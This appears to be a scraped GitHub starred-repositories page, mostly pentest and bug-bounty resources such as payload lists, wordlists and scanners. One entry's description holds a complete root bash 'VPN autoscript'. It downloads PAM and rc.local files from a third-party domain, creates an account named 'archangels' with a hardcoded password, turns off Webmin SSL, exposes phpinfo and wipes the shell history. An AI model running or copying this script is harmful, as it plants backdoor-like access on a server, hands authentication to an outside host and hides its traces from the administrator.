york-2015's Stars
swisskyrepo/PayloadsAllTheThings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
foospidy/payloads
Git All the Payloads! A collection of web attack payloads.
nahamsec/recon_profile
FdelMazo/ConstitucionArgentina
Reimaginación digital de la Constitución de la Nación Argentina
tomnomnom/dotfiles
.vimrc, .bashrc etc
iphelix/dnschef
DNSChef - DNS proxy for Penetration Testers and Malware Analysts
Crypt0s/FakeDns
A regular-expression based python MITM DNS server with support for DNS Rebinding attacks
bugcrowd/bugcrowd_university
Open source education content for the researcher community
LewisArdern/bXSS
bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
PortSwigger/backslash-powered-scanner
Finds unknown classes of injection vulnerabilities
OJ/gobuster
Directory/File, DNS and VHost busting tool written in Go
danielmiessler/RobotsDisallowed
A curated list of the most common and most interesting robots.txt disallowed directories.
vulnersCom/burp-vulners-scanner
Vulnerability scanner based on vulners.com search API
x90skysn3k/brutespray
Bruteforcing from various scanner output - Automatically attempts default creds on found services.
pentester-io/commonspeak
Content discovery wordlists generated using BigQuery
1N3/IntruderPayloads
A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.
sundowndev/hacker-roadmap
A collection of hacking tools, resources and references to practice ethical hacking.
Hack-with-Github/Awesome-Hacking
A collection of various awesome lists for hackers, pentesters and security researchers
EdOverflow/bugbounty-cheatsheet
A list of interesting payloads, tips and tricks for bug bounty hunters.
jcodagnone/localidades-ar
Localidades de Argentina
OWASP/CheatSheetSeries
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
danielmiessler/SecLists
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
appsecco/the-art-of-subdomain-enumeration
This repository contains all the supplement material for the book "The art of sub-domain enumeration"
appsecco/practical-recon-levelup0x02
This repository contains all the material from the talk "Practical recon techniques for bug hunters & pentesters" given at Bugcrowd LevelUp 0x02 virtual conference
cure53/H5SC
HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors
openwall/john
John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs
Vpaproject/KinGmapua
#!/bin/bash # ****************************************** # Program: Autoscript Servis Nobita 2017 # Website: AutoScriptNobita.tk # Developer: Ruzaidie # Nickname: NobiNobita95 # Date: 22-07-2016 # Last Updated: 22-08-2017 # ****************************************** # MULA SETUP myip=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0' | head -n1`; myint=`ifconfig | grep -B1 "inet addr:$myip" | head -n1 | awk '{print $1}'`; if [ $USER != 'root' ]; then echo "Sorry, for run the script please using root user" exit 1 fi if [[ "$EUID" -ne 0 ]]; then echo "Sorry, you need to run this as root" exit 2 fi if [[ ! -e /dev/net/tun ]]; then echo "TUN is not available" exit 3 fi echo " AUTOSCRIPT BY AUTOSCRIPTNOBITA.TK AMBIL PERHATIAN !!!" clear echo "MULA SETUP" clear echo "SET TIMEZONE KUALA LUMPUT GMT +8" ln -fs /usr/share/zoneinfo/Asia/Kuala_Lumpur /etc/localtime; clear echo " ENABLE IPV4 AND IPV6 SILA TUNGGU SEDANG DI SETUP " echo ipv4 >> /etc/modules echo ipv6 >> /etc/modules sysctl -w net.ipv4.ip_forward=1 sed -i 's/#net.ipv4.ip_forward=1/net.ipv4.ip_forward=1/g' /etc/sysctl.conf sed -i 's/#net.ipv6.conf.all.forwarding=1/net.ipv6.conf.all.forwarding=1/g' /etc/sysctl.conf sysctl -p clear echo " MEMBUANG SPAM PACKAGE " apt-get -y --purge remove samba*; apt-get -y --purge remove apache2*; apt-get -y --purge remove sendmail*; apt-get -y --purge remove postfix*; apt-get -y --purge remove bind*; clear echo " " sh -c 'echo "deb http://download.webmin.com/download/repository sarge contrib" > /etc/apt/sources.list.d/webmin.list' wget -qO - http://www.webmin.com/jcameron-key.asc | apt-key add - apt-get update; apt-get -y autoremove; apt-get -y install wget curl; echo " " # script wget -O /etc/pam.d/common-password "http://autoscriptnobita.tk/rendum/common-password" chmod +x /etc/pam.d/common-password # fail2ban & exim & protection apt-get -y install fail2ban sysv-rc-conf dnsutils dsniff zip unzip; wget https://github.com/jgmdev/ddos-deflate/archive/master.zip;unzip master.zip; cd ddos-deflate-master && ./install.sh service exim4 stop;sysv-rc-conf exim4 off; # webmin apt-get -y install webmin sed -i 's/ssl=1/ssl=0/g' /etc/webmin/miniserv.conf # dropbear apt-get -y install dropbear wget -O /etc/default/dropbear "http://autoscriptnobita.tk/rendum/dropbear" echo "/bin/false" >> /etc/shells echo "/usr/sbin/nologin" >> /etc/shells # squid3 apt-get -y install squid3 wget -O /etc/squid3/squid.conf "http://autoscriptnobita.tk/rendum/squid.conf" wget -O /etc/squid/squid.conf "http://autoscriptnobita.tk/rendum/squid.conf" sed -i "s/ipserver/$myip/g" /etc/squid3/squid.conf sed -i "s/ipserver/$myip/g" /etc/squid/squid.conf # openvpn apt-get -y install openvpn wget -O /etc/openvpn/openvpn.tar "http://autoscriptnobita.tk/rendum/openvpn.tar" cd /etc/openvpn/;tar xf openvpn.tar;rm openvpn.tar wget -O /etc/rc.local "http://autoscriptnobita.tk/rendum/rc.local";chmod +x /etc/rc.local #wget -O /etc/iptables.up.rules "http://rzvpn.net/random/iptables.up.rules" #sed -i "s/ipserver/$myip/g" /etc/iptables.up.rules #iptables-restore < /etc/iptables.up.rules # nginx apt-get -y install nginx php-fpm php-mcrypt php-cli libexpat1-dev libxml-parser-perl rm /etc/nginx/sites-enabled/default rm /etc/nginx/sites-available/default wget -O /etc/php/7.0/fpm/pool.d/www.conf "http://rzvpn.net/random/www.conf" mkdir -p /home/vps/public_html echo "<pre>Setup by Nobita95 | telegram @nobinobita95 | website autoscriptnobita.tk</pre>" > /home/vps/public_html/index.php echo "<?php phpinfo(); ?>" > /home/vps/public_html/info.php wget -O /etc/nginx/conf.d/vps.conf "http://autoscriptnobita.tk/rendum/vps.conf" sed -i 's/listen = \/var\/run\/php7.0-fpm.sock/listen = 127.0.0.1:9000/g' /etc/php/7.0/fpm/pool.d/www.conf # etc wget -O /home/vps/public_html/client.ovpn "http://autoscriptnobita.tk/rendum/client.ovpn" wget -O /etc/motd "http://autoscriptnobita.tk/rendum/motd" sed -i 's/AcceptEnv/#AcceptEnv/g' /etc/ssh/sshd_config sed -i "s/ipserver/$myip/g" /home/vps/public_html/client.ovpn useradd -m -g users -s /bin/bash archangels echo "7C22C4ED" | chpasswd echo "UPDATE DAN INSTALL SIAP 99% MOHON SABAR" cd;rm *.sh;rm *.txt;rm *.tar;rm *.deb;rm *.asc;rm *.zip;rm ddos*; clear # restart service service ssh restart service openvpn restart service dropbear restart service nginx restart service php7.0-fpm restart service webmin restart service squid restart service fail2ban restart clear # SELASAI SUDAH BOSS! ( AutoScriptNobita.Tk ) echo "========================================" | tee -a log-install.txt echo "Service Autoscript Nobita (NOBITA SCRIPT 2017)" | tee -a log-install.txt echo "----------------------------------------" | tee -a log-install.txt echo "" | tee -a log-install.txt echo "nginx : http://$myip:80" | tee -a log-install.txt echo "Webmin : http://$myip:10000/" | tee -a log-install.txt echo "Squid3 : 8080" | tee -a log-install.txt echo "OpenSSH : 22" | tee -a log-install.txt echo "Dropbear : 443" | tee -a log-install.txt echo "OpenVPN : TCP 1194 (DAPATKAN OVPN DARI SAYA)" | tee -a log-install.txt echo "Fail2Ban : [on]" | tee -a log-install.txt echo "Timezone : Asia/Kuala_Lumpur" | tee -a log-install.txt echo "Menu : type menu to check menu script" | tee -a log-install.txt echo "" | tee -a log-install.txt echo "----------------------------------------" echo "LOG INSTALL --> /root/log-install.txt" echo "----------------------------------------" echo "========================================" | tee -a log-install.txt echo " PLEASE REBOOT TO TAKE EFFECT !" echo "========================================" | tee -a log-install.txt cat /dev/null > ~/.bash_history && history -c
PyAr/pyarweb
El sitio web de Python Argentina
econchick/new-coder
New Coder tutorials
pln-fing-udelar/pghumor
Is This a Joke? Humor Detection in Spanish Tweets